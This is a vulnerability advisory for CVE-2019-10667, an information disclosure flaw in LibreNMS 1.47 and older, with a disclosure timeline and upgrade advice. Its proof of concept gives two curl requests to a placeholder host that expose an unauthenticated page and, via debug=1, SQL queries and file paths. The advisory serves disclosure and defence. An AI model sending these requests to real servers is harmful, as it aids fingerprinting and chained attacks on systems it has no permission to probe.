LibreNMS Information Disclosure Vulnerability

15 July 2019

 

CVE   

 

CVE-2019-10667

 

CVSS SCORE

 

5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)

 

XID

 

XL-19-018

 

AFFECTED VENDORS

 

LibreNMS (www.librenms.org)

 

CREDIT

 

Eldar Marcussen - xen1thLabs - Software Labs

 

VULNERABILITY SUMMARY       

 

 

There are a number of information disclosure vulnerabilities affecting LibreNMS, an attacker can fingerprint the exact code version installed and disclose local file paths. This vulnerability can be combined with other vulnerabilities identified by xen1thLabs to achieve unauthenticated remote code execution.

 

TECHNICAL DETAILS

     

 

There are several pages within LibreNMS that disclose information to unauthenticated attackers, usually by adding “debug=1” to the query string. The information disclosed typically include SQL queries, database performance stats and local file paths.

 

PROOF OF CONCEPT  

$ curl 'https://host/pages/about.inc.php'

 

 

 

 

Figure 1: About library script missing the authentication check

 

 

$ curl 'https://host/legacy_index.php?debug=1'

 

 

SQL[select * from `plugins` where `plugin_active` = ? [1] 0.45ms] 
Fatal error: Uncaught Error: Class 'Auth' not found in /opt/librenms/html/legacy_index.php:164 Stack trace: #0 {main} thrown in /opt/librenms/html/legacy_index.php on line 164

 

AFFECTED SYSTEMS  

  

LibreNMS 1.47 and older

 

SOLUTION  

 

Upgrade to the latest version of LibreNMS

 

DISCLOSURE TIMELINE 

 

 

 

26/03/2019 - Contacted LibreNMS developer requesting disclosure coordination

28/03/2019 - Provided vulnerability details

16/04/2019 – Version 1.50.1 released which resolves this issue

15/07/2019 – xen1thLabs public disclosure